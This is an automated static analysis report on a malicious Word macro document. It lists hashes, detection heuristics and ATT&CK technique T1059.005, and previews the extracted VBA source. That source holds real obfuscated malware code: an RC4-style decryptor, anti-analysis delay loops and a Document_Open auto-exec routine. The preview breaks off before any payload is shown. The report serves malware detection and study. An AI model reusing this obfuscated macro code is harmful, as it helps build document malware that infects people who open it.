Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1e947c0486787355…

MALICIOUS

Office (OLE)

179.0 KB Created: 2016-02-03 15:48:00 Authoring application: Microsoft Office Word First seen: 2017-11-29
MD5: 41be8a21ee158408d26fa28544694c34 SHA-1: 03ca1c7fb0f29dfb9de3bc927e46bccbe5648f0f SHA-256: 1e947c048678735590772db24edc8edc87421e75fda8c077188db41117204488
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Office document containing a VBA macro. The 'Document_Open' macro is configured to execute a shell command, which is a common technique for downloading and executing additional malicious content. The VBA code appears to be obfuscated, but the presence of a Shell() call and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic strongly indicate malicious intent. The ClamAV detection further supports this assessment.

Heuristics 6

  • ClamAV: Doc.Trojan.Agent-1383194 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-1383194
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 81974 bytes
SHA-256: bf4295b2ce7e59bcd0268351a48a8e2b977357936fc67c319ac851512b557dbb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim JfivWS9SZ7WoqhDd(1964) As Long
Function KJweeS3op7841P8E(SER7vxeZYI0Q() As Byte, ByVal Xs4I3V9EABN6EK As String) As String
On Error Resume Next
Dim TQAQPZSYFYsmuf(0 To 255) As Integer, Qw5H2DwqC3hL2g As Long, TS07fruhrS As Long, Uob3No4WhlZ As Long, A00KNrQsV As Byte, UkG22() As Byte, Gf91c() As Byte
ReDim UkG22(UBound(SER7vxeZYI0Q)) As Byte
UkG22 = SER7vxeZYI0Q
Gf91c = StrConv(Xs4I3V9EABN6EK, (32 + 152 + 32 - 152 + 32 + 152 + 32 - 152))
For Qw5H2DwqC3hL2g = 0 To (64 + 105 + 64 - 105 + 64 + 105 + 64 - 105 - 1)
TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = Qw5H2DwqC3hL2g
Next Qw5H2DwqC3hL2g
Qw5H2DwqC3hL2g = 0
TS07fruhrS = 0
Uob3No4WhlZ = 0
For Qw5H2DwqC3hL2g = 0 To (64 + 621 + 64 - 621 + 64 + 621 + 64 - 621 - 1)
TS07fruhrS = (TS07fruhrS + TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) + Gf91c(Qw5H2DwqC3hL2g Mod Len(Xs4I3V9EABN6EK))) Mod ((64 + 600 + 64 - 600 + 64 + 600 + 64 - 600))
A00KNrQsV = TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g)
TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = TQAQPZSYFYsmuf(TS07fruhrS)
TQAQPZSYFYsmuf(TS07fruhrS) = A00KNrQsV
Next Qw5H2DwqC3hL2g
Qw5H2DwqC3hL2g = 0
TS07fruhrS = 0
Uob3No4WhlZ = 0
For Qw5H2DwqC3hL2g = 0 To UBound(SER7vxeZYI0Q)
TS07fruhrS = (TS07fruhrS + 1) Mod 256
Uob3No4WhlZ = (Uob3No4WhlZ + TQAQPZSYFYsmuf(TS07fruhrS)) Mod 256
A00KNrQsV = TQAQPZSYFYsmuf(TS07fruhrS)
TQAQPZSYFYsmuf(TS07fruhrS) = TQAQPZSYFYsmuf(Uob3No4WhlZ)
TQAQPZSYFYsmuf(Uob3No4WhlZ) = A00KNrQsV
UkG22(Qw5H2DwqC3hL2g) = U98MGIgy41PxtG(UkG22(Qw5H2DwqC3hL2g), (TQAQPZSYFYsmuf((TQAQPZSYFYsmuf(TS07fruhrS) + TQAQPZSYFYsmuf(Uob3No4WhlZ)) Mod ((64 + 408 + 64 - 408 + 64 + 408 + 64 - 408)))))
Next Qw5H2DwqC3hL2g
KJweeS3op7841P8E = StrConv(UkG22, (16 + 412 + 16 - 412 + 16 + 412 + 16 - 412))
End Function
Function U98MGIgy41PxtG(Ofw3MR, VGqhXSqhj)
WZHwd = Year(Now) '26
U98MGIgy41PxtG = (Ofw3MR And Not VGqhXSqhj) Or (Not Ofw3MR And VGqhXSqhj)
XfMSsOftg = Year(Now) '51
End Function
Function X6kwgMbNgJ(Ak1HZBnpV As Integer) As Boolean
CMeq1Qt4lApz = Year(Now) '48
Static Ci2s21H7C As Byte
CY23LTC1bd = Year(Now) '82
Ci2s21H7C = Ci2s21H7C + 1
QTs = Year(Now) '87
If Ci2s21H7C = 1 Then Debug.Assert Not X6kwgMbNgJ(39)
MEa5IA2DpUk = Year(Now) '60
X6kwgMbNgJ = Ci2s21H7C = 0
OKHIljrqVgp = Year(Now) '98
Ci2s21H7C = 0
I8LqdGeSl = Year(Now) '89
End Function
Sub DoYYO2UPaL()
YIDVntj3YK2wc = Year(Now) '46
If CDbl(94) = True Then GQaj8PEg = 67
DatePart "EUppxcBiHgB", 75
Log 25
Month 75
FreeFile 96
App.StartLogging "Ct9JP3HTB7K", 85
Err.Clear
DoEvents
BWELN = LCase(21)
IsError 15
MEdt75AApXXWLZ = Year(Now) '67
End Sub
Sub Document_Open()
JaqGPwoPu48YczqN = Year(Now) '37
On Error Resume Next
LWb9ZjskfwlJHS = Year(Now) '74
Dim Ds1jSlIYao5X As Long, RDr2Y As Long, HP85djOxI8AGedne As Long
BzvbUy = Year(Now) '44
Ds1jSlIYao5X = 93364438: RDr2Y = 0: HP85djOxI8AGedne = 0
IonXs47akeQMk = Year(Now) '35
For RDr2Y = 1 To Ds1jSlIYao5X
HP85djOxI8AGedne = HP85djOxI8AGedne + 1
Next RDr2Y
Xt0UUX5QcqO3Ns = Year(Now) '48
If HP85djOxI8AGedne = Ds1jSlIYao5X Then
CP7eYRX89Nn = Year(Now) '23
Dim VoF1MHx9 As Integer, PA2YVLe As String
For VoF1MHx9 = 4 To 426
PA2YVLe = PA2YVLe + VoF1MHx9
Next
Rv1KdBVm1X = Year(Now) '58
If (13.5 + 30 + 13.5 - 30 + 13.5 + 30 + 13.5 - 30 - 1) = (13.5 + 325 + 13.5 - 325 + 13.5 + 325 + 13.5 - 325 - 1) Then
DviWOuB = Year(Now) '48
VVkBYsJicw2DlUAmV = Year(Now) '23
If X6kwgMbNgJ(15) = True Then
YLArIfSr = Year(Now) '14
HDjs9On9a9Y
KwIdzptJqryh = Year(Now) '58
Else
Ia5y06lXt1Vs = Year(Now) '86
DoYYO2UPaL
NMpb0m = Year(Now) '26
End If
Else
DVHXbu3ZcQAc = Year(Now) '8
DoYYO2UPaL
HYGDr = Year(Now) '71
End If
PgeRSvr6icpl = Year(Now) '87
Else
KCxZonr18oR = Year(Now) '1
DoYYO2UPaL
DcDipOwiUXXXD4 = Year(Now) '29
End If
ReCn7 = Year(Now) '87
End Sub
Function Ya3FssyIa(ByVal Rpwp7G0fmiW As Variant) As Long
YxoXhe8cWBdV1F = 
... (truncated)